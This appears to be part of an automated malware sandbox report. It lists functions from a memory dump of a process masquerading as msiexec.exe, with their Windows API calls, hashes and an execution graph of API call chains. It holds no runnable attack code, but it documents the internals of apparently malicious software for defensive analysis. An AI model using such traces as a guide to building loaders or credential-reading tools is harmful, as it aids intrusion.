                                                                                                        • Opcode ID: 0a04a3b2eb8c332b91505517cc79849e5df2eea02ec33caf39dead53ea986dd4
                                                                                                        • Instruction ID: 63d89676ac606a57b84cec989251f2b58c461556a229900524a7ed76b3d9d409
                                                                                                        • Opcode Fuzzy Hash: 0a04a3b2eb8c332b91505517cc79849e5df2eea02ec33caf39dead53ea986dd4
                                                                                                        • Instruction Fuzzy Hash: DCF03078895754DBC6115F289A81C093BF5F72AB543860906FE1B9B2D8D73DC4A5CB80
                                                                                                        Function 228E4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 228E4C1D
                                                                                                        • _free.LIBCMT ref: 228E4CE8
                                                                                                        • _free.LIBCMT ref: 228E4CF2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$FileModuleName
                                                                                                        • String ID: C:\Windows\System32\msiexec.exe
                                                                                                        • API String ID: 2506810119-1382325751
                                                                                                        • Opcode ID: 9661e2f1a423f74b9fc5171a19d24778743183b51f095a6d0b98a76940c4fc92
                                                                                                        • Instruction ID: 50dd3906ca314b67f84d1d50539c4c527d39251d1667a117a0ba3496aef8eefb
                                                                                                        • Opcode Fuzzy Hash: 9661e2f1a423f74b9fc5171a19d24778743183b51f095a6d0b98a76940c4fc92
                                                                                                        • Instruction Fuzzy Hash: 06318079A40358EFEB11CF998980D9EBBFCEB9A310F104056F90E97241D675DA41CB60
                                                                                                        Function 228E86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,228E6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 228E8731
                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 228E87BA
                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 228E87CC
                                                                                                        • __freea.LIBCMT ref: 228E87D5
                                                                                                          • Part of subcall function 228E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 228E5702
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                        • String ID:
                                                                                                        • API String ID: 2652629310-0
                                                                                                        • Opcode ID: 91cc2eedfe3070f338a97cc46bb4d665dc715c539bbbe1b3bc981234951f5e07
                                                                                                        • Instruction ID: 93df11712414f63167c90dc093ec98ae4ee4bfd0569463af32bd03eaeac80b71
                                                                                                        • Opcode Fuzzy Hash: 91cc2eedfe3070f338a97cc46bb4d665dc715c539bbbe1b3bc981234951f5e07
                                                                                                        • Instruction Fuzzy Hash: 1131CE76A0030AEBDF148F64CC81DAF7BA5EB42314F410168FD0EDA1A0EB35C994CB91
                                                                                                        Function 228EC7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(228EC7DD), ref: 228EC7E6
                                                                                                        • GetModuleHandleA.KERNEL32(?,228EC7DD), ref: 228EC838
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 228EC860
                                                                                                          • Part of subcall function 228EC803: GetProcAddress.KERNEL32(00000000,228EC7F4), ref: 228EC804
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1646373207-0
                                                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                        • Instruction ID: bf61ee1a5436e60582d0f919e361ef858fe7b1d244305d81f5eb23ed1f2988c9
                                                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                        • Instruction Fuzzy Hash: 68012E18D45370F8AA1352780F01AAA6FD89B27664F101B96F37FC6193CAA0C602C3A6
                                                                                                        Function 228E5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,228E1D66,00000000,00000000,?,228E5C88,228E1D66,00000000,00000000,00000000,?,228E5E85,00000006,FlsSetValue), ref: 228E5D13
                                                                                                        • GetLastError.KERNEL32(?,228E5C88,228E1D66,00000000,00000000,00000000,?,228E5E85,00000006,FlsSetValue,228EE190,FlsSetValue,00000000,00000364,?,228E5BC8), ref: 228E5D1F
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,228E5C88,228E1D66,00000000,00000000,00000000,?,228E5E85,00000006,FlsSetValue,228EE190,FlsSetValue,00000000), ref: 228E5D2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3177248105-0
                                                                                                        • Opcode ID: 6c098cfbeb071ab8f1554cf9e3a8a1a3bcd3054d80a3ea9895679187595f67b6
                                                                                                        • Instruction ID: 75df52c82bf549dde040ee4848899ce240b4d7f6983733eb2c40dec335b29040
                                                                                                        • Opcode Fuzzy Hash: 6c098cfbeb071ab8f1554cf9e3a8a1a3bcd3054d80a3ea9895679187595f67b6
                                                                                                        • Instruction Fuzzy Hash: AA01883A752326EBD7115E689C48E4A77DCAF066B1B140A30FE1FDB184E728E505C6D0
                                                                                                        Function 228E63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 228E655C
                                                                                                          • Part of subcall function 228E62BC: IsProcessorFeaturePresent.KERNEL32(00000017,228E62AB,00000000,?,?,?,?,00000016,?,?,228E62B8,00000000,00000000,00000000,00000000,00000000), ref: 228E62BE
                                                                                                          • Part of subcall function 228E62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 228E62E0
                                                                                                          • Part of subcall function 228E62BC: TerminateProcess.KERNEL32(00000000), ref: 228E62E7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                        • String ID: *?$.
                                                                                                        • API String ID: 2667617558-3972193922
                                                                                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                        • Instruction ID: e381c2553aa1e9159e6454e3bbc271167e13cb6248a83f263647b23aed04bde5
                                                                                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                        • Instruction Fuzzy Hash: 18518179E00329DFDB04CFA8C980AADBBB5EF59314F248169E95DE7306E635DA01CB50
                                                                                                        Function 228E16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen
                                                                                                        • String ID: : $Se.
                                                                                                        • API String ID: 4218353326-4089948878
                                                                                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                        • Instruction ID: b6fada5f239db185fbc37014afa539a2da38f9d473a44e41c5896b613ccbe06e
                                                                                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                        • Instruction Fuzzy Hash: 7411C4B5A00348AECB15CFAC9841BEEFBFCAF1A704F104056E54AE7212E6749A02C765
                                                                                                        Function 228E1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 228E2903
                                                                                                          • Part of subcall function 228E35D2: RaiseException.KERNEL32(?,?,?,228E2925,00000000,00000000,00000000,?,?,?,?,?,228E2925,?,228F21B8), ref: 228E3632
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 228E2920
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                        • String ID: Unknown exception
                                                                                                        • API String ID: 3476068407-410509341
                                                                                                        • Opcode ID: 9cd324896126359d67b4872f21147dfaada7e8fbbc4d019b4730e4e5d65bae04
                                                                                                        • Instruction ID: 795deb59f619bd7c2b68dfb761801c45087753de7b5a98ae64dcd770d7f7d876
                                                                                                        • Opcode Fuzzy Hash: 9cd324896126359d67b4872f21147dfaada7e8fbbc4d019b4730e4e5d65bae04
                                                                                                        • Instruction Fuzzy Hash: B6F0A43C90030DF78B00A6A8EC44D69B76C5B27750F904274BA2F96198FBF1EA65C5C2

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:5.7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:1.3%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:73
                                                                                                        execution_graph 37676 4466f4 37695 446904 37676->37695 37678 446700 GetModuleHandleA 37681 446710 __set_app_type __p__fmode __p__commode 37678->37681 37680 4467a4 37682 4467ac __setusermatherr 37680->37682 37683 4467b8 37680->37683 37681->37680 37682->37683 37696 4468f0 _controlfp 37683->37696 37685 4467bd _initterm __wgetmainargs _initterm 37686 44681e GetStartupInfoW 37685->37686 37687 446810 37685->37687 37689 446866 GetModuleHandleA 37686->37689 37697 41276d 37689->37697 37693 446896 exit 37694 44689d _cexit 37693->37694 37694->37687 37695->37678 37696->37685 37698 41277d 37697->37698 37740 4044a4 LoadLibraryW 37698->37740 37700 412785 37731 412789 37700->37731 37748 414b81 37700->37748 37703 4127c8 37754 412465 memset ??2@YAPAXI 37703->37754 37705 4127ea 37766 40ac21 37705->37766 37710 412813 37784 40dd07 memset 37710->37784 37711 412827 37789 40db69 memset 37711->37789 37715 412822 37811 4125b6 ??3@YAXPAX DeleteObject 37715->37811 37716 40ada2 _wcsicmp 37717 41283d 37716->37717 37717->37715 37720 412863 CoInitialize 37717->37720 37794 41268e 37717->37794 37719 412966 37812 40b1ab free free 37719->37812 37810 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37720->37810 37724 41296f 37813 40b633 37724->37813 37726 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37732 412957 CoUninitialize 37726->37732 37737 4128ca 37726->37737 37731->37693 37731->37694 37732->37715 37733 4128d0 TranslateAcceleratorW 37734 412941 GetMessageW 37733->37734 37733->37737 37734->37732 37734->37733 37735 412909 IsDialogMessageW 37735->37734 37735->37737 37736 4128fd IsDialogMessageW 37736->37734 37736->37735 37737->37733 37737->37735 37737->37736 37738 41292b TranslateMessage DispatchMessageW 37737->37738 37739 41291f IsDialogMessageW 37737->37739 37738->37734 37739->37734 37739->37738 37741 4044cf GetProcAddress 37740->37741 37745 4044f7 37740->37745 37742 4044e8 FreeLibrary 37741->37742 37743 4044df 37741->37743 37744 4044f3 37742->37744 37742->37745 37743->37742 37744->37745 37746 404507 MessageBoxW 37745->37746 37747 40451e 37745->37747 37746->37700 37747->37700 37749 414b8a 37748->37749 37750 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37748->37750 37817 40a804 memset 37749->37817 37750->37703 37753 414b9e GetProcAddress 37753->37750 37756 4124e0 37754->37756 37755 412505 ??2@YAPAXI 37757 41251c 37755->37757 37760 412521 37755->37760 37756->37755 37839 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37757->37839 37828 444722 37760->37828 37765 41259b wcscpy 37765->37705 37844 40b1ab free free 37766->37844 37768 40ad76 37845 40aa04 37768->37845 37771 40ad4b 37771->37768 37868 40a9ce 37771->37868 37772 40a9ce malloc memcpy free free 37778 40ac5c 37772->37778 37774 40ace7 free 37774->37778 37778->37768 37778->37771 37778->37772 37778->37774 37848 40a8d0 37778->37848 37860 4099f4 37778->37860 37779 40a8d0 7 API calls 37779->37768 37780 40ada2 37781 40adaa 37780->37781 37782 40adc9 37780->37782 37781->37782 37783 40adb3 _wcsicmp 37781->37783 37782->37710 37782->37711 37783->37781 37783->37782 37873 40dce0 37784->37873 37786 40dd3a GetModuleHandleW 37878 40dba7 37786->37878 37790 40dce0 3 API calls 37789->37790 37791 40db99 37790->37791 37950 40dae1 37791->37950 37964 402f3a 37794->37964 37796 412766 37796->37715 37796->37720 37797 4126d3 _wcsicmp 37798 4126a8 37797->37798 37798->37796 37798->37797 37800 41270a 37798->37800 37998 4125f8 7 API calls 37798->37998 37800->37796 37967 411ac5 37800->37967 37810->37726 37811->37719 37812->37724 37814 40b640 37813->37814 37815 40b639 free 37813->37815 37816 40b1ab free free 37814->37816 37815->37814 37816->37731 37818 40a83b GetSystemDirectoryW 37817->37818 37819 40a84c wcscpy 37817->37819 37818->37819 37824 409719 wcslen 37819->37824 37822 40a881 LoadLibraryW 37823 40a886 37822->37823 37823->37750 37823->37753 37825 409724 37824->37825 37826 409739 wcscat LoadLibraryW 37824->37826 37825->37826 37827 40972c wcscat 37825->37827 37826->37822 37826->37823 37827->37826 37829 444732 37828->37829 37830 444728 DeleteObject 37828->37830 37840 409cc3 37829->37840 37830->37829 37832 412551 37833 4010f9 37832->37833 37834 401130 37833->37834 37835 401134 GetModuleHandleW LoadIconW 37834->37835 37836 401107 wcsncat 37834->37836 37837 40a7be 37835->37837 37836->37834 37838 40a7d2 37837->37838 37838->37765 37838->37838 37839->37760 37843 409bfd memset wcscpy 37840->37843 37842 409cdb CreateFontIndirectW 37842->37832 37843->37842 37844->37778 37846 40aa14 37845->37846 37847 40aa0a free 37845->37847 37846->37780 37847->37846 37849 40a8eb 37848->37849 37850 40a8df wcslen 37848->37850 37851 40a906 free 37849->37851 37852 40a90f 37849->37852 37850->37849 37853 40a919 37851->37853 37854 4099f4 3 API calls 37852->37854 37855 40a932 37853->37855 37856 40a929 free 37853->37856 37854->37853 37858 4099f4 3 API calls 37855->37858 37857 40a93e memcpy 37856->37857 37857->37778 37859 40a93d 37858->37859 37859->37857 37861 409a41 37860->37861 37862 4099fb malloc 37860->37862 37861->37778 37864 409a37 37862->37864 37865 409a1c 37862->37865 37864->37778 37866 409a30 free 37865->37866 37867 409a20 memcpy 37865->37867 37866->37864 37867->37866 37869 40a9e7 37868->37869 37870 40a9dc free 37868->37870 37872 4099f4 3 API calls 37869->37872 37871 40a9f2 37870->37871 37871->37779 37872->37871 37897 409bca GetModuleFileNameW 37873->37897 37875 40dce6 wcsrchr 37876 40dcf5 37875->37876 37877 40dcf9 wcscat 37875->37877 37876->37877 37877->37786 37898 44db70 37878->37898 37882 40dbfd 37901 4447d9 37882->37901 37885 40dc34 wcscpy wcscpy 37927 40d6f5 37885->37927 37886 40dc1f wcscpy 37886->37885 37889 40d6f5 3 API calls 37890 40dc73 37889->37890 37891 40d6f5 3 API calls 37890->37891 37892 40dc89 37891->37892 37893 40d6f5 3 API calls 37892->37893 37894 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37893->37894 37933 40da80 37894->37933 37897->37875 37899 40dbb4 memset memset 37898->37899 37900 409bca GetModuleFileNameW 37899->37900 37900->37882 37903 4447f4 37901->37903 37902 40dc1b 37902->37885 37902->37886 37903->37902 37904 444807 ??2@YAPAXI 37903->37904 37905 44481f 37904->37905 37906 444873 _snwprintf 37905->37906 37907 4448ab wcscpy 37905->37907 37940 44474a 8 API calls 37906->37940 37909 4448bb 37907->37909 37941 44474a 8 API calls 37909->37941 37910 4448a7 37910->37907 37910->37909 37912 4448cd 37942 44474a 8 API calls 37912->37942 37914 4448e2 37943 44474a 8 API calls 37914->37943 37916 4448f7 37944 44474a 8 API calls 37916->37944 37918 44490c 37945 44474a 8 API calls 37918->37945 37920 444921 37946 44474a 8 API calls 37920->37946 37922 444936 37947 44474a 8 API calls 37922->37947 37924 44494b 37948 44474a 8 API calls 37924->37948 37926 444960 ??3@YAXPAX 37926->37902 37928 44db70 37927->37928 37929 40d702 memset GetPrivateProfileStringW 37928->37929 37930 40d752 37929->37930 37931 40d75c WritePrivateProfileStringW 37929->37931 37930->37931 37932 40d758 37930->37932 37931->37932 37932->37889 37934 44db70 37933->37934 37935 40da8d memset 37934->37935 37936 40daac LoadStringW 37935->37936 37937 40dac6 37936->37937 37937->37936 37939 40dade 37937->37939 37949 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37937->37949 37939->37715 37940->37910 37941->37912 37942->37914 37943->37916 37944->37918 37945->37920 37946->37922 37947->37924 37948->37926 37949->37937 37960 409b98 GetFileAttributesW 37950->37960 37952 40daea 37953 40daef wcscpy wcscpy GetPrivateProfileIntW 37952->37953 37959 40db63 37952->37959 37961 40d65d GetPrivateProfileStringW 37953->37961 37955 40db3e 37962 40d65d GetPrivateProfileStringW 37955->37962 37957 40db4f 37963 40d65d GetPrivateProfileStringW 37957->37963 37959->37716 37960->37952 37961->37955 37962->37957 37963->37959 37999 40eaff 37964->37999 37968 411ae2 memset 37967->37968 37969 411b8f 37967->37969 38040 409bca GetModuleFileNameW 37968->38040 37981 411a8b 37969->37981 37971 411b0a wcsrchr 37972 411b22 wcscat 37971->37972 37973 411b1f 37971->37973 38041 414770 wcscpy wcscpy wcscpy CloseHandle 37972->38041 37973->37972 37975 411b67 38042 402afb 37975->38042 37979 411b7f 38098 40ea13 SendMessageW memset SendMessageW 37979->38098 37982 402afb 27 API calls 37981->37982 37983 411ac0 37982->37983 37984 4110dc 37983->37984 37985 41113e 37984->37985 37990 4110f0 37984->37990 38123 40969c LoadCursorW SetCursor 37985->38123 37987 411143 38124 4032b4 37987->38124 38142 444a54 37987->38142 37988 4110f7 _wcsicmp 37988->37990 37989 411157 37991 40ada2 _wcsicmp 37989->37991 37990->37985 37990->37988 38145 410c46 10 API calls 37990->38145 37994 411167 37991->37994 37992 4111af 37994->37992 37995 4111a6 qsort 37994->37995 37995->37992 37998->37798 38000 40eb10 37999->38000 38013 40e8e0 38000->38013 38003 40eb6c memcpy memcpy 38004 40ebe1 38003->38004 38005 40ebb7 38003->38005 38004->38003 38006 40ebf2 ??2@YAPAXI ??2@YAPAXI 38004->38006 38005->38004 38007 40d134 16 API calls 38005->38007 38008 40ec2e ??2@YAPAXI 38006->38008 38011 40ec65 38006->38011 38007->38005 38008->38011 38023 40ea7f 38011->38023 38012 402f49 38012->37798 38014 40e8f2 38013->38014 38015 40e8eb ??3@YAXPAX 38013->38015 38016 40e900 38014->38016 38017 40e8f9 ??3@YAXPAX 38014->38017 38015->38014 38018 40e90a ??3@YAXPAX 38016->38018 38020 40e911 38016->38020 38017->38016 38018->38020 38019 40e931 ??2@YAPAXI ??2@YAPAXI 38019->38003 38020->38019 38021 40e921 ??3@YAXPAX 38020->38021 38022 40e92a ??3@YAXPAX 38020->38022 38021->38022 38022->38019 38024 40aa04 free 38023->38024 38025 40ea88 38024->38025 38026 40aa04 free 38025->38026 38027 40ea90 38026->38027 38028 40aa04 free 38027->38028 38029 40ea98 38028->38029 38030 40aa04 free 38029->38030 38031 40eaa0 38030->38031 38032 40a9ce 4 API calls 38031->38032 38033 40eab3 38032->38033 38034 40a9ce 4 API calls 38033->38034 38035 40eabd 38034->38035 38036 40a9ce 4 API calls 38035->38036 38037 40eac7 38036->38037 38038 40a9ce 4 API calls 38037->38038 38039 40ead1 38038->38039 38039->38012 38040->37971 38041->37975 38099 40b2cc 38042->38099 38044 402b0a 38045 40b2cc 27 API calls 38044->38045 38046 402b23 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402b3a 38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402b54 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402b6b 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402b82 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402b99 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402bb0 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402bc7 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402bde 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402bf5 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402c0c 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402c23 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402c3a 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402c51 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402c68 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402c7f 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402c99 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402cb3 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402cd5 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402cf0 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402d0b 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402d26 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402d3e 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402d59 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402d78 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402d93 38095->38096 38097 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38096->38097 38097->37979 38098->37969 38102 40b58d 38099->38102 38101 40b2d1 38101->38044 38103 40b5a4 GetModuleHandleW FindResourceW 38102->38103 38104 40b62e 38102->38104 38105 40b5c2 LoadResource 38103->38105 38107 40b5e7 38103->38107 38104->38101 38106 40b5d0 SizeofResource LockResource 38105->38106 38105->38107 38106->38107 38107->38104 38115 40afcf 38107->38115 38109 40b608 memcpy 38118 40b4d3 memcpy 38109->38118 38111 40b61e 38119 40b3c1 18 API calls 38111->38119 38113 40b626 38120 40b04b 38113->38120 38116 40b04b ??3@YAXPAX 38115->38116 38117 40afd7 ??2@YAPAXI 38116->38117 38117->38109 38118->38111 38119->38113 38121 40b051 ??3@YAXPAX 38120->38121 38122 40b05f 38120->38122 38121->38122 38122->38104 38123->37987 38125 4032c4 38124->38125 38126 40b633 free 38125->38126 38127 403316 38126->38127 38146 44553b 38127->38146 38131 403480 38344 40368c 15 API calls 38131->38344 38133 403489 38134 40b633 free 38133->38134 38135 403495 38134->38135 38135->37989 38136 4033a9 memset memcpy 38137 4033ec wcscmp 38136->38137 38138 40333c 38136->38138 38137->38138 38138->38131 38138->38136 38138->38137 38342 4028e7 11 API calls 38138->38342 38343 40f508 6 API calls 38138->38343 38141 403421 _wcsicmp 38141->38138 38143 444a64 FreeLibrary 38142->38143 38144 444a83 38142->38144 38143->38144 38144->37989 38145->37990 38147 445548 38146->38147 38148 445599 38147->38148 38345 40c768 38147->38345 38149 4455a8 memset 38148->38149 38157 4457f2 38148->38157 38428 403988 38149->38428 38155 4455e5 38170 445672 38155->38170 38175 44560f 38155->38175 38160 445854 38157->38160 38530 403e2d memset memset memset memset memset 38157->38530 38158 4458bb memset memset 38162 414c2e 14 API calls 38158->38162 38205 4458aa 38160->38205 38553 403c9c memset memset memset memset memset 38160->38553 38161 44595e memset memset 38165 414c2e 14 API calls 38161->38165 38166 4458f9 38162->38166 38164 445a00 memset memset 38576 414c2e 38164->38576 38173 44599c 38165->38173 38174 40b2cc 27 API calls 38166->38174 38167 44558c 38412 444b06 38167->38412 38168 44557a 38168->38167 38623 4136c0 CoTaskMemFree 38168->38623 38439 403fbe memset memset memset memset memset 38170->38439 38183 40b2cc 27 API calls 38173->38183 38184 445909 38174->38184 38186 4087b3 337 API calls 38175->38186 38177 445bca 38185 445c8b memset memset 38177->38185 38241 445cf0 38177->38241 38178 445b38 memset memset memset 38189 445bd4 38178->38189 38190 445b98 38178->38190 38179 445849 38639 40b1ab free free 38179->38639 38199 4459ac 38183->38199 38196 409d1f 6 API calls 38184->38196 38200 414c2e 14 API calls 38185->38200 38197 445621 38186->38197 38187 445585 38624 41366b FreeLibrary 38187->38624 38188 44589f 38640 40b1ab free free 38188->38640 38194 414c2e 14 API calls 38189->38194 38190->38189 38202 445ba2 38190->38202 38191 4456b2 38627 40b1ab free free 38191->38627 38192 40b2cc 27 API calls 38204 445a4f 38192->38204 38207 445be2 38194->38207 38195 403335 38341 4452e5 45 API calls 38195->38341 38210 445919 38196->38210 38625 4454bf 20 API calls 38197->38625 38198 445823 38198->38179 38219 4087b3 337 API calls 38198->38219 38211 409d1f 6 API calls 38199->38211 38212 445cc9 38200->38212 38710 4099c6 wcslen 38202->38710 38589 409d1f wcslen wcslen 38204->38589 38205->38158 38238 44594a 38205->38238 38217 40b2cc 27 API calls 38207->38217 38208 445d3d 38237 40b2cc 27 API calls 38208->38237 38209 445d88 memset memset memset 38220 414c2e 14 API calls 38209->38220 38641 409b98 GetFileAttributesW 38210->38641 38221 4459bc 38211->38221 38222 409d1f 6 API calls 38212->38222 38213 445879 38213->38188 38224 4087b3 337 API calls 38213->38224 38214 445bb3 38713 445403 memset 38214->38713 38215 445680 38215->38191 38462 4087b3 memset 38215->38462 38227 445bf3 38217->38227 38219->38198 38230 445dde 38220->38230 38706 409b98 GetFileAttributesW 38221->38706 38223 445ce1 38222->38223 38730 409b98 GetFileAttributesW 38223->38730 38224->38213 38236 409d1f 6 API calls 38227->38236 38228 445928 38228->38238 38642 40b6ef 38228->38642 38239 40b2cc 27 API calls 38230->38239 38235 40b2cc 27 API calls 38243 445a94 38235->38243 38245 445c07 38236->38245 38246 445d54 _wcsicmp 38237->38246 38238->38161 38250 4459ed 38238->38250 38249 445def 38239->38249 38240 4459cb 38240->38250 38257 40b6ef 249 API calls 38240->38257 38241->38195 38241->38208 38241->38209 38242 445389 255 API calls 38242->38177 38594 40ae18 38243->38594 38244 44566d 38244->38157 38513 413d4c 